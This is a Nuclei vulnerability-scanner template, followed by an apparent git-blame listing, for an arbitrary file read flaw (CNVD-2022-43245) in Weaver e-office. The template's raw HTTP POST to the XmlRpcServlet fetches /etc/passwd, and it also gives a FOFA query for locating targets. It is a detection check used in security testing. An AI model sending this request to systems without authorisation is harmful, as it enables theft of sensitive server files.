nuclei-templates/http/cnvd/2022/CNVD-2022-43245.yaml

id: CNVD-2022-43245

info:
  name: Weaver OA XmlRpcServlet - Arbitary File Read
  author: SleepingBag945
  severity: high
  description: |
    e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  tags: cnvd,cnvd2022,weaver,e-office,oa,lfi

http:
  - raw:
      - |
        POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?><methodCall>
        <methodName>WorkflowService.getAttachment</methodName>
        <params><param><value><string>/etc/passwd</string>
        </value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<methodResponse><params><param><value><base64>"

      - type: word
        part: header
        words:
          - "text/xml"

      - type: status
        status:
          - 200

# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950
completed assigned templates 2023-09-13 11:22:00 +00:00			`id: CNVD-2022-43245`
Added some Templates 2023-08-18 03:22:06 +00:00
			`info:`
completed assigned templates 2023-09-13 11:22:00 +00:00			`name: Weaver OA XmlRpcServlet - Arbitary File Read`
Added some Templates 2023-08-18 03:22:06 +00:00			`author: SleepingBag945`
			`severity: high`
completed assigned templates 2023-09-13 11:22:00 +00:00			`description: \|`
			`e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.`
			`metadata:`
templateman update 2023-10-14 11:27:55 +00:00			`verified: true`
completed assigned templates 2023-09-13 11:22:00 +00:00			`max-request: 1`
			`fofa-query: app="泛微-协同办公OA"`
			`tags: cnvd,cnvd2022,weaver,e-office,oa,lfi`
Added some Templates 2023-08-18 03:22:06 +00:00
			`http:`
			`- raw:`
			`- \|`
			`POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/xml`

			`<?xml version="1.0" encoding="UTF-8"?><methodCall>`
			`<methodName>WorkflowService.getAttachment</methodName>`
			`<params><param><value><string>/etc/passwd</string>`
			`</value></param></params></methodCall>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
completed assigned templates 2023-09-13 11:22:00 +00:00			`part: body`
updated templates 2023-09-17 16:11:07 +00:00			`words:`
Added some Templates 2023-08-18 03:22:06 +00:00			`- "<methodResponse><params><param><value><base64>"`
completed assigned templates 2023-09-13 11:22:00 +00:00
			`- type: word`
			`part: header`
updated templates 2023-09-17 16:11:07 +00:00			`words:`
completed assigned templates 2023-09-13 11:22:00 +00:00			`- "text/xml"`

Added some Templates 2023-08-18 03:22:06 +00:00			`- type: status`
			`status:`
templateman update 2023-10-14 11:27:55 +00:00			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950`